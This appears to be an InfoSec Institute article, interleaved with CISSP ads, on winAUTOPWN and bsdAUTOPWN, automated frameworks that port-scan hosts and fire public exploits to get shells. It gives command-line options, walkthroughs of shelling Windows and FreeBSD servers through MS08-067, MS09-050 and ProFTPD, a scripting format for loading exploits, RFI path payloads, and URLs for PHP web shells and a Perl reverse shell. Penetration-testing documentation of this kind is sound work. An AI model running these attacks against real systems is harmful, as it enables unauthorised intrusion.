What is winAUTOPWN?

winAUTOPWN is a minimal Interactive Exploit Framework which acts as a frontend for quick systems vulnerability exploitation. It is a collection of remote exploits using which one can compromise vulnerable systems. winAUTOPWN takes inputs like IP address, Hostname, CMS Path, etc. and does a smart multi-threaded portscan for TCP ports 1 to 65535. Open ports are then recognized and exploits applicable to those ports are executed with the aim of gaining a remote shell or the ability to run remote commands in certain cases.

Concisely, WINDOWS AUTOPWN or winAUTOPWN is an auto (hacking) shell gaining tool.

Besides the above, winAUTOPWN can also be used as an efficiency testing tool for Intrusion Detection Systems (IDS) and Web Application Filters (WAF). winAUTOPWN has a vast repository of exploits for various Operating systems like Microsoft Windows, Apple MAC OSX, Linux (various), BSD systems as well as for well-known services and daemon software. winAUTOPWN also contains a massive database of Shell Upload Vulnerability, Remote File Inclusion and Remote Command Execution exploits. These can be fired one after the other instantly and this can aide is checking if the WAF is preventing / alerting accordingly against such threats or no. Similarly shell aiming exploits too can be fired up in a row to test the strength and effectiveness of IDS and IPS

winAUTOPWN also has a BSD based cousin called bsdAUTOPWN. bsdAUTOPWN is a just like winAUTOPWN but is not an exact recompilation of winAUTOPWN. It has been written from scratch for and on FreeBSD OS to match the power and functionality offered by the Operating System. Like winAUTOPWN, even bsdAUTOPWN has a multi-threaded portscan feature and it too detects open ports and attempts to exploit them accordingly using the available exploits in the arsenal. We’ll come to a detailed discussion about bsdAUTOPWN later.

Why winAUTOPWN?

winAUTOPWN is the only framework available on the Internet to date which maintains the exploit style and the exploit writer’s credits and, many times, the exploits completely intact. Besides that, the exploit is used just the way it is without changing any major functionality. Shellcodes or the impact making part of the exploit is many times changed from default “calculator launching code” to a remote TCP port binding shellcode. Also hardcoded hindrances like IP addresses, ports; URLs, etc. are removed to suit automation.

winAUTOPWN is a quick and small interface which is regularly updated with recent exploits available both in the wild as well as those released by the vendors themselves. winAUTOPWN is the only available exploit Framework which will ask you nothing but the least details about your target. You do not have to worry about which exploit to try onto which open port. Let winAUTOPWN handle it for you.

Although this may sound like child’s play – with a script kiddie attitude, winAUTOPWN can be used in a both blind attacking as well as in a smart strategized approach. It has features to test only a few customized (user-written/selected) exploits and/or even a few selective pre-loaded exploits according to the open ports the attacker wishes too use. This makes it more than just a script-kiddie tool wherein if you have already understood your target setup, you have the liberty to test your expertise by firing only the closest exploits which are promising, which may get you quickly in, thus making you faster than most blind script kiddies.

You can have multiple instances of winAUTOPWN/bsdAUTOPWN running (strictly in multiple directories) targeting multiple targets without disturbing each other. winAUTOPWN is the only exploit framework which doesn’t re-code the original exploit entirely and uses the publicly available exploits released over the Internet.

What is bsdAUTOPWN?

As mentioned earlier bsdAUTOPWN (BSD AUTOPWN) is a BSD version of winAUTOPWN. It performs pretty much the same actions which winAUTOPWN does. BSD AUTOPWN uses the same exploits/directory as winAUTOPWN. Note that BSD AUTOPWN was entirely written from scratch and is not a line-by-like replica or a direct compilation/porting of winAUTOPWN. bsdAUTOPWN comes along with winAUTOPWN in the same directory and there is no separate BSD pkg for it. BSD AUTOPWN and relevant exploit binaries are available in a compiled form for FreeBSD x86, FreeBSD x64 and Dragonfly BSD x86 and the filenames for the main binaries are bsdAUTOPWN, bsdAUTOPWN.x64 and bsdAUTOPWN.dfly.SVR4 respectively. These can be checked with brandelf on BSD systems.

You can download the tool here: http://winautopwn.co.nr Extract the winAUTOPWN files and set the executable flag.

For x86 release, perform the below
chmod +x bsdAUTOPWN
./bsdAUTOPWN

For x64 release, perform the below
chmod +x bsdAUTOPWN.x64
./bsdAUTOPWN.x64

For DFLY SVR4 release, perform the below
chmod +x bsdAUTOPWN.dfly.SVR4
./bsdAUTOPWN.dfly.SVR4

BSD AUTOPWN won’t run on Linux platforms directly. BSD AUTOPWN is the smallest and fastest Systems Exploit Framework available for FreeBSD systems.

Want to learn more?? The InfoSec Institute CISSP Training course trains and prepares you to pass the premier security certification, the CISSP. Professionals that hold the CISSP have demonstrated that they have deep knowledge of all 10 Common Body of Knowledge Domains, and have the necessary skills to provide leadership in the creation and operational duties of enterprise wide information security programs.

InfoSec Institute's proprietary CISSP certification courseware materials are always up to date and synchronized with the latest ISC2 exam objectives. Our industry leading course curriculum combined with our award-winning CISSP training provided by expert instructors delivers the platform you need in order to pass the CISSP exam with flying colors. You will leave the InfoSec Institute CISSP Boot Camp with the knowledge and domain expertise to successfully pass the CISSP exam the first time you take it. Some benefits of the CISSP Boot Camp are:

  • Dual Certification - CISSP and ISSEP/ISSMP/ISSAP
  • We have cultivated a strong reputation for getting at the secrets of the CISSP certification exam
  • Our materials are always updated with the latest information on the exam objectives: This is NOT a Common Body of Knowledge review-it is intense, successful preparation for CISSP certification.
  • We focus on preparing you for the CISSP certification exam through drill sessions, review of the entire Common Body of Knowledge, and practical question and answer scenarios, all following a high-energy seminar approach.

How to use winAUTOPWN?

Since winAUTOPWN relies on freely available exploits written in many languages, scripting languages like Perl, PHP and Python are required to be present on the system where winAUTOPWN will be used. A few exploits which are available and/or written in C, C#, Java or other compiler based languages are pre-compiled and readily made available.

winAUTOPWN has an intuitive console which takes the following inputs :

  1. Target Host IP address – Enter the system on which you want to test exploits
  2. Target Hostname – Enter the Target System’s hostname / DNS Name
  3. Attacker’s IP address – Enter your IP address for connect back and a few exploits.

There are other options too which are required if you intend to test Web Application Vulnerability exploits using winAUTOPWN, these are:

  1. Target CMS Path – Enter the Content Management System path. This is generally the very first folder name which is seen right after the domain name. Example : If the URL is http://www.somewebsite.com/application1/test.php then the CMS Path is /application1
  2. Actual CMS Path – This is the actual path of the CMS hosted on the Target Server. Example : /opt/share/www OR /opt/lampp/htdocs/logicx/tmp/agora

By default, due to the large number of Remote File Inclusion and Remote Shell Upload and Remote Command Execution based vulnerabilities available in winAUTOPWN exploit repository, the options to test these are set to OFF by default. To enable them start winAUTOPWN with the arguments:

Want to learn more?? The InfoSec Institute CISSP Training course trains and prepares you to pass the premier security certification, the CISSP. Professionals that hold the CISSP have demonstrated that they have deep knowledge of all 10 Common Body of Knowledge Domains, and have the necessary skills to provide leadership in the creation and operational duties of enterprise wide information security programs.

InfoSec Institute's proprietary CISSP certification courseware materials are always up to date and synchronized with the latest ISC2 exam objectives. Our industry leading course curriculum combined with our award-winning CISSP training provided by expert instructors delivers the platform you need in order to pass the CISSP exam with flying colors. You will leave the InfoSec Institute CISSP Boot Camp with the knowledge and domain expertise to successfully pass the CISSP exam the first time you take it. Some benefits of the CISSP Boot Camp are:

  • Dual Certification - CISSP and ISSEP/ISSMP/ISSAP
  • We have cultivated a strong reputation for getting at the secrets of the CISSP certification exam
  • Our materials are always updated with the latest information on the exam objectives: This is NOT a Common Body of Knowledge review-it is intense, successful preparation for CISSP certification.
  • We focus on preparing you for the CISSP certification exam through drill sessions, review of the entire Common Body of Knowledge, and practical question and answer scenarios, all following a high-energy seminar approach.

winAUTOPWN –doRSHto force Remote Shell Upload Web-app Vulnerability Module.

winAUTOPWN -doRFI to force Remote File Inclusion Web-app Vulnerability Scan Module.

winAUTOPWN -doRCE to force Remote Code Execution Web-app Vulnerability Scan Module.

  1. Interactive PHP Shell Path – This is the path of the PHP web-shell path to be used along with Remote File Inclusion exploits. There is always a default encoded path. Your path should look something like: http://somewebsite/r57.txt
    This is optional but is essential for RFI Exploits.
  2. CMS Administrator Username – This is the username of the CMS Admin if known to the attacker. This is optional but essential in certain privilege escalation exploits, where the web-app can be used to gain full control over the server.
  3. FTP/CMS Username – This one the username of the FTP / CMS Server if known to the attacker.
  4. FTP/CMS Password – This one is the password of the FTP / CMS Server if known to the attacker.
  5. Proxy IP – This is the Proxy IP address which can be used in a few exploits which support this feature.
  6. Proxy Port – This is the Proxy Port which the attacker can use in a few exploits which support this feature.

Note that winAUTOPWN will test these and all other port 80 based exploits after finishing checks for exploits of all other ports.

winAUTOPWN has a Windows GUI as well, which takes similar inputs and feeds it to the main winAUTOPWN console:

Example of a filled winAUTOPWN GUI which will pass on the arguments to the console :

You will notice in the screenshot above a parameter called MAXTHREADS. Any operating system has a limit to number of connections which can be made to an IP at a time. This is true to the IP address to which we are connecting as well. The portscan module in-built inside winAUTOPWN changes the threads according to the IP address. If the IP address is a private in nature like 10.x.x.x or 192.168.x.x then it sets 100 threads as default. It is set lower if the IP address is a public IP.

This can be overridden with the MAXTHREADS option if the user wishes to do so in conditions where public IP addresses are used in a Local private LAN. This might also be helpful in a scenario where you want to do an extremely slow portscan.

Use the MAXTHREADS xx parameter as shown above winAUTOPWN.exe MAXTHREADS 20 to set number of threads, in this case 20.

How to use command-line in winAUTOPWN ?

Command-line usage has always been a mark of a power user in any console based penetration testing tool. winAUTOPWN’s entire interactive interface can be pre-fed with values using command line options as explained below :

  • -skipscan This option can force winAUTOPWN to skip the port-scan module and use the file OpenPorts.TXT in the directory. This is a useful feature when you know what open ports are available on your target system. One can just fill in the port numbers and save the file. This is also helpful in situations when you want winAUTOPWN to check for exploits for one or a few particular ports.

    Example winAUTOPWN.exe –skipscan

  • -onlyscan This option can force winAUTOPWN to skip the entire exploit testing modules. Hence, by using this module winAUTOPWN will only perform a PortScan and will exit after printing the list of OpenPorts .

    Example winAUTOPWN.exe –onlyscan

  • -targetIP This option can be used to provide the Target IP address of the system being tested. Ensure that you specify the IP address after it.

    Example winAUTOPWN.exe –targetIP 192.168.3.3

  • -targetHOST This option can be used to provide the Target Hostname of the system being tested. Ensure that you specify the complete Netbios name for Windows systems on LAN and the entire domain name for Target Systems on WAN.

    Example winAUTOPWN.exe –targetHOST SYSTEM-2
    winAUTOPWN.exe –targetHOST www.somewebsite9.com

  • -attackerIP This option can be used to provide your own IP, which is the Attacker’s IP address of the system from where winAUTOPWN is being run. Ensure that you specify the IP address after it.

    Example winAUTOPWN.exe –attackerIP 192.168.3.34

  • -cmsPATH This option can be used to specify the Content Management System directory name in the URL. Generally this is the first directory name right after the end of the Domain name or the IP address. Ensure that you specify the correct cmsPATH. You can leave this blank if you do not intend to test the web application vulnerability exploits.

    Example winAUTOPWN.exe –cmsPATH /xampp

  • -actcmsPATH This option can be used to specify the Actual Content Management System or the internal Actual CMS Path of the URL. Generally this is not visible in the URL. A lot of times CMS packages installed on the webserver have a default path making it easily guessable. Ensure that you specify the correct actcmsPATH. You can leave this blank if you do not intend to test the web application vulnerability exploits.

    Example winAUTOPWN.exe –actcmsPATH /Applications/xampp
    winAUTOPWN.exe –actcmsPATH /opt/xampp

  • -phpshellPATH This option can be used specify the path of the online PHP Web-shell which would be used along with the Remote File Inclusion Vulnerability Exploits. There is a default encoded PHP web-shell path. To change it, ensure that you specify the correct phpshellPATH which accepts a variable named CMD to execute system commands. The GET request should look like http://shellp.ath/shell.php?CMD=ls

    You can leave this blank if you do not intend to test the web application vulnerability exploits.
    Example winAUTOPWN.exe –phpshellPATH http://website.moc/folder/r57.txt

  • -actphpshellPATH This option can be used specify the actual internal path of the online PHP Web-shell which would be used along with the Remote File Inclusion Vulnerability Exploits. You can leave this blank if you do not intend to test the web application vulnerability exploits.

    Example winAUTOPWN.exe –actphpshellPATH /var/log/tmp

  • -cmsadminUSR This option can be used specify the administrator /admin username if known. This is required for a few web-app exploits to work correctly. You can leave this blank if you do not intend to test the web application vulnerability exploits.

    Example winAUTOPWN.exe –cmsadminUSR admin9

  • -ftpUSR This option can be used specify the FTP User name if known. This is required for a few FTP exploits to work correctly. If you leave this blank winAUTOPWN will set an internal default FTP Username.

    Example winAUTOPWN.exe –ftpUSR user6

  • -ftpPASSWD This option can be used specify the FTP Password if known. This is required for a few FTP exploits to work correctly. If you leave this blank winAUTOPWN will set an internal default FTP Password.

    Example winAUTOPWN.exe –ftpPASSWD S3cR37P@55W0rD

  • -perlrevshURL This option can be used specify the path of a remote Perl script which should be able to send a /bin/sh or an equivalent shell to a remote IP. The script should ideally have the capability to be invoked as perl <remote_ip> <remote_port>. Note that the remote_IP will be your IP to which your target will connect and the remote_port will be a port opened on your IP. You do not have to worry about providing parameters to the Perl file or opening the port locally, winAUTOPWN will automatically handle it, because that’s what WINDOWS AUTOPWN actually means. Also note that any Perl script with these capabilities can be used and can be hosted on any webserver. This option just needs the path to this Perl file. This Perl script will be pointed to and used in a few exploits in which a remote connect back shell is used as a payload. There is a default Perl shell path encoded so if you have no clue or an online resource, you can leave this option blank and winAUTOPWN will try to handle it on its own.

    Example winAUTOPWN.exe –perlrevshURL http://website.moc/various/reverse-shell.pl

  • -mailFROM This option can be used to specify the sender’s email address to be used in a few SMTP exploits. This field has a default sender’s email address crafted by winAUTOPWN. It is always root@<target_hostname> where target hostname is the –targetHOST provided earlier. You can set a value to this field to override the default value set.

    Example winAUTOPWN.exe –mailFROM admin@some.web.info

  • -mailTO This option can be used specify the receiver’s email address to be used in a few SMTP Exploits. This field has a default receiver’s email address crafted by winAUTOPWN. It is always postmaster@<target_hostname> where target hostname is the –targetHOST provided earlier. You can set a value to this field to override the default value set.

    Example winAUTOPWN.exe –mailTO postmaster@some.web.info

  • -proxyIP This option can be used to provide the Proxy Server IP address. Do note that only a few exploits support Proxies and that too if you have supplied a Proxy IP and a Proxy port. Ensure that you specify the correct Proxy IP address after it.

    Example winAUTOPWN.exe –proxyIP 192.168.3.80

  • -proxyPORT This option can be used to provide the Proxy Server Port Number. Do note that only a few exploits support Proxies and that too if you have supplied a Proxy IP and a Proxy port. Ensure that you specify the correct Proxy Port Number address after it.

    Example winAUTOPWN.exe –proxyIP 8080

Can you show me winAUTOPWN in Action?

Scenario I: Windows Home Server / Windows 2003 Server

Screenshots given below are a good description of seeing bsdAUTOPWN in action. Parameters like Target IP, Target HostName and Attacker IP are specified. After this, bsdAUTOPWN does a portscan and tests all old as well recent exploits and if lucky, gets you a shell. In the example below the target system was vulnerable to the infamous MS08-067 vulnerability (which was also used by Conficker to propagate itself).

In the screenshot above, bsdAUTOPWN is provided with the Target IP, Target Hostname and Attacker IP. Since we don’t intend to break into the target system using a web-app this time we do not enter the web application parameters like CMS Path / CMS Username , CMS Password, etc.

We need to provide one more parameter here which is the Target Operating System. There are ways to determine which Operating system is your Target is running. A simpler way to do this for Windows Server OSes is to check if Terminal Services is running. A plain connection to the RDP port will give away the banner / picture and will help you fingerprint it instantly. The screenshot below shows that the target is running Windows Home Server which is actually based on Windows 2003.

We enter the appropriate Target OS (Number three in this case for Windows 2003 / Home Server 2011).

BSD AUTOPWN (which is running on FreeBSD 8.2 in this case) does a portscan and shows all open ports of that system. BSD AUTOPWN / WINDOWS AUTOPWN have threaded smart-portscan which changes the number of threads according to the nature of the IP. For Local Area Network or private IPs it uses a lot of threads, but since number of open connections might be a limit for websites public IP or due to your ISP regulations, this is set to 10 by default for public IPs. Of course these can be tampered with the MAXTHREADS parameter as described previously.

After completing the portscan it saves the results in OpenPorts.TXT and starts tackling one port at a time, starting with the first one – port 80. It fires all exploits it knows for the default webserver port. Note that bsdAUTOPWN doesn’t contain web-app exploits like Remote File Include, Shel Upload and Remote Code Execution exploiting web-app vulnerabilities. It contains direct exploits targeting the webserver vulnerabilities. You can use winAUTOPWN if you intend to exploit RFI, RCE and Remote Shell Upload vulnerabilities.

Out of these ports, one exploit targeting MS08-067 succeeded and the attacker gained a shell.

The screenshot above shows us that the target IP 192.168.1.1 with hostname WINSERVER-2011 (as keyed in earlier) has been successfully exploited.

Now we add a user named winautopwn and log in to the Target and login using Terminal Services Client.

The screenshot above shows that we are logged in and we add a file on C:Documents and SettingswinautopwnDesktopwinautopwn.txt using the shell which we gained. It reflects instantly on the compromised system in the RDesktop interface.

You just WINAUTOPWN-ed a vulnerable system!

Scenario II: FreeBSD 7.2Release (FTP Server)

Screenshots given below are a good description of seeing bsdAUTOPWN in action attempting to exploit a FreeBSD Server running a vulnerable version of ProFTPD.

In this example we use the command line:

./bsdAUTOPWN –skipscan

Since we already have the port 21 for FTP Server in our mind, only a few minimum required options are filled in. We provide the Target IP address, Target Hostname and our own attacker IP address which is required for a few connect back exploits and shellcodes.

Along with these options another important option to be filled in for this session and which should be almost filled in for all bsdAUTOPWN sessions is the “Target OS” entry. Filling this in makes it easier for bsdAUTOPWN to select which exploits should be targeted and using which OS-specific parameters.

Here in this case as you can see below, we have chosen the Target OS as 13 which is FreeBSD (x86).

After providing these inputs we can see that bsdAUTOPWN instantly parses the OpenPorts.TXT file and checks for list of open ports (as mentioned earlier).

On seeing port 21 open it fires up all FTP Server relates exploits. Al lot of FTP Server related exploits need authentication. Even if one hasn’t provided this in the first bsdAUTOPWN entry screen, still this gets auto generated by bsdAUTOPWN.

After testing a few FTP Server related exploits, finally it reaches to test ProFTPD 1.3.2e running on our Target Server. The exploit parameters are arranged and this exploit is fired up to run the exploit code according to FreeBSD 7.2 environment for the ProFTPD Server 1.3.2e.

The original payload for this exploit as available publicly for both Linux and FreeBSD environments is a reverse connect payload which requires you to use netcat and keep a port in listening mode.

This payload has been changed/modified to bind a shell on a pre-determined port.

A successful attempt looks like this, giving the attacker a shell using the telnet interface to the Target’s system.

Scenario III: Windows 2008 Server

Screenshots given below are a good description of seeing bsdAUTOPWN in action attempting to exploit a Windows Server setup.

In another example below let use target the SMB port once again. This time let us skip the portscan again assuming a scenario where the attacker knows the list of open ports and suspects that the corresponding services/daemons associated with them could be vulnerable.

To skip port scan on winAUTOPWN first save the list of open ports one below the other in OpenPorts.TXT

and then type:

winAUTOPWN.exe –skipscan

You may go one step ahead and provide other parameters in the command line itself which would anyways be asked in the Interactive session.

winAUTOPWN.exe –skipscan -targetIP 192.168.5.128 –attackerIP 192.168.5.24

After we provide all the remaining arguments (both mandatory and optional) winAUTOPWN opens OpenPorts.TXT and tackles one port at a time and fires all exploits for that particular port known to it.

As we can see here, it has finished checking FTPd exploits and now is testing NetBIOS exploits:

It reaches port 445 in the OpenPorts.TXT and starts the SMB exploits We can see winAUTOPWN checking if the target is vulnerable to NetDDE buffer overflow (MS04-031) and MS08-067 exploit. Do note that it has more than just one publicly available exploit of the above vulnerability. winAUTOPWN tests every exploit applicable to the SMB service (and every service) which is available in the exploits/directory.

WINDOWS AUTOPWN continues firing exploits without the user having to interact with the console to provide any arguments of the exploits or any inputs. Whatever inputs were taken on the first screen is reused here and the exploit parameters are auto handled by winAUTOPWN.

Here we can see MS05-039 – Windows Plug-and-Play Service Service Remote Overflow Exploit and SRV2.SYS Negotiate ProcessID Function Table Dereference Exploit are being tested.

We discover that winAUTOPWN successfully exploits the SMBV2 Negotiate Function vulnerability Exploit (MS09-050) (CVE-2009-3103) and gains a shell quickly.

This exploit is pre-compiled for winAUTOPWN and not by the exploit writer who had only released the source. After a little tweaking the source code was successfully compiled and it binds a cmd shell on the target on port 2876. winAUTOPWN telnets to that port hence giving the attacker a shell.

Note that a non-MS Windows signed telnet.exe is specially made available in the exploits/ directory. This is just in case the user doesn’t have telnet.exe in the WINDOWS/ or WINDOWS/SYSTEM32/ directory.

You may replace it NetCat and rename the nc.exe to telnet.exe as well if you wish to use NetCat as your default connecting application.

The screenshot above demonstrates simple command like ipconfig and hostname and confirms that the Target IP was winAUTOPWN-ed in seconds !!

But the fun doesn’t end here. WINDOWS AUTOPWN continues testing other exploits for all remaining ports after the user exits the shell obtained. This aids the attacker to even count and record the number and name of the vulnerabilities exploited.

How to load new and personalized exploits in winAUTOPWN ?

WINDOWS AUTOPWN being a framework supports exploits written in almost all languages in vogue. If you intend to write your own exploit and run it in winAUTOPWN, it’s very simple to achieve that. You can write exploits in Perl, Python, PHP, C (compiled) and Java (compiled).

You can even include your 0-day exploits loaded in winAUTOPWN.

This feature of WINDOWS AUTOPWN is called WINDOWS AUTOPWN EXPLOIT LOADING

FRAMEWORK [ welf ] and welf scripting Language is called WELL or WINDOWS AUTOPWN EXPLOIT LOADING LANGUAGE .

Once you have your exploit to be run ready, all you need to do is to copy them in the welfexploits/ directory. After this run winAUTOPWN with the parameter –welf along with the welf-script file name. It should look like this:

winAUTOPWN.exe –welf myWELFexploits.txt

The file (in the above case) myWELFexploits.txt will contain lines scripted in WELL.

The syntax is pretty simple. Consider the following exploit arguments:

rpcdcom.exe 0 10.40.140.23 135

How to write this in WELL ?

Here rpcdcom.exe is the exploit name and is a Pre compiled PE Binary.

0 is the additional parameter it needs followed by Target IP address and Port.

Hence, your myWELFexploits.txt should contain

<PE> rpcdcom.exe 0 <TARGETIP> 135 ^^^^

Consider another example:
perl king_cms_0.3_exploit.pl www.website.com /kingcms /usr/home/tim/www/kingcms

This exploit since written in perl, the welf-script line starts with it. If the exploit was in PHP, it would read PHP <exploitname> <other-parameters> ^^^^

The ^^^^ denotes end of arguments for that particular line and it’s the EOL

It is a mandatory ultratag to notify WELF that the exploit script for the particular exploit has finished and it can now parse the next one.

So, do not forget to write ^^^^ after every exploit script line.

Anyways, the above PERL exploit can be added in the welfexploits/ directory and the line in myWELFexploits should read
<PERL> king_cms_0.3_exploit.pl <TARGETHOSTNAME> <CMSPATH> <ACTUALCMSPATH> ^^^^

What are the other WELF Scripting Terminologies?

<LANGNAME> can be <PYTHON>, <PERL>, <PHP> OR <PE>(for exe files)
<EXPLOITNAME> is the filename of the Exploit. Ex: exploitname.exe
<TARGETIP> is your Target’s IP address. Ex: 10.40.140.1
<TARGETHOSTNAME> is your Target’s Hostname. Ex: www.somegate.com OR TSUNAMI-MP11
<ATTACKERIP> is your IP. Ex: 10.40.140.144
<CMSPATH> is the Target CMS Path. Ex: /awstats
<ACTUALCMSPATH> is the Actual CMS Path on the disk. Ex: /usr/home/www/awstats
<PHPSHELLPATH> is an online URL for a php shell. Ex: http://www.shell.com/phpshell.txt
<CMSADMINUSRNAME> is a admin username for the Target CMS.
<FTPCMSUSRNAME> is FTP/CMS Username
<FTPCMSPASSWD> is FTP/CMS Password.
<PROXYIP> is Proxy IP address to be used for some exploits to pass through
<PROXYPORT> is Proxy Port Number to be used for some exploits to pass through
<CMSPATH/> is the CMS Path with a trailing slah. Ex: /awstats/
<ACTUALCMSPATH> is the Actual CMS Path on the disk with a trailing slash. Ex: /usr/home/www/awstats/
<TARGETHOSTNAME/CMSPATH> is the typical complete address of the Target Hostname alongwith the CMS Path. Ex: www.somesite.com/awstats<
<TARGETHOSTNAME/CMSPATH/> is the typical complete address of the Target Hostname alongwith the CMS Path with a trailing slash. Ex: www.somesite.com/awstats/
<HTTPCMSPATH> is the CMS path following the standard http:// . Ex: http://www.somesite.com/awstats
<HTTPTARGETHOSTNAME> is the Target HostName following the standard http:// . Ex: http://www.somesite.com
<PERLREVSHPATH> is the online URL for a perl reverse connect script. Ex. http://vrac.fifi.be/warehouse/various/reverse-shell.pl
<MAILFROM> is the sender’s email address to be used in a few SMTP exploits.
<MAILTO> is the receiver’s email address to be used in a few SMTP exploits.
Sample welf script (myWELFexploits.txt) with three exploits to be loaded:
PERL webframe_0.76_RFI(c99)-xplt_method3.pl -vuln <TARGETHOSTNAME/CMSPATH/> -shell <PHPSHELLPATH> ^^^^
PYTHON Steamcast(HTTP_Request)_(SEH)_Rem_Buf_Ovrflw_xplt.py <TARGETIP> 80 100 ^^^^
<PE> bitweaver_firecmd.exe <TARGETHOSTNAME> <CMSPATH/> <FTPCMSUSRNAME> <FTPCMSPASSWD> ^^^^

To run the above script, as mentioned earlier run
winAUTOPWN.exe –welf myWELFexploits.txt

What are the other Web Application Exploits which WINDOWS AUTOPWN supports?

WINDOWS AUTOPWN has a large repository of exploits targeting web-app vulnerabilities like Remote Shell Upload, Remote File Inclusion and Remote Command Execution. winAUTOPWN has a file called RFI_List.txt in the exploits/ directory.

You can append the file to add newer RFI exploits when needed.
The syntax of this file is very simple:
Even numbered line contains the RFI Path along with the vulnerable file and function/variable name and odd numbered lines contain the Banner Text to be echoed.

Below is an excerpt from RFI_List .txt
AdaptCMS 2.0.0 Beta (init.php) Remote File Inclusion Vulnerability Exploit
/inc/smarty/libs/init.php?sitepath=
AimEx 3.0 Remote Include Exploit
/spaw/spaw_control.class.php?spaw_root=

What are the risks involved when running winAUTOPWN ?

  • The risks are no different than any involved when you run other penetration testing tools or exploit frameworks. While it is true that WINDOWS AUTOPWN does rely mostly on exploits written and available freely publicly over the internet, it isn’t common where we get to see some exploit running in the wild which causes damage to the attacker itself. Most times the payload for buffer overflow, heap overflow, stack overflow etc. exploits are the standard calc.exe for Windows and uname –a or ping under Linux/ other *nix. winAUTOPWN changes these payloads to suit the aim in order to get a shell. Hence the payloads are in a way tested before adding an exploit to winAUTOPWN.
  • There are a few exploits which need you to open a port for reverse connecting using netcat(nc). Please understand that open ports are a risk. While in this scenario it has been opened up for the target to connect back to you, you still stand a good risk since the port is open. Also note that a reverse connect will make you open a port on any Exploit Framework, hence winAUTOPWN does nothing different in this case.
  • At times winAUTOPWN might have to include pre-compiled released exploit binaries whose source code isn’t available. The primary reason for such binaries is because the author chooses not to release the source code. Although to date there isn’t any exploit in winAUTOPWN’s exploits directory which causes a direct damage to the attacker’s system itself, still it is best to be paranoid and hence WINDOWS AUTOPWN doesn’t guarantee or take responsibility for what the exploit written by the author does but this being said I can guarantee you that there is not exploit purposely added to cause any damage to the attacker’s system.

How can I update winAUTOPWN ?

WINDOWS AUTOPWN is released at regular intervals with latest exploits to compromise and gain shell or run remote commands on your target systems. These are the stable releases. Besides these if you want to stay abreast of all current exploits added daily/weekly you need to download the Unpolished SITA versions of winAUTOPWN which too are available on the same download page – http://winautopwn.co.nr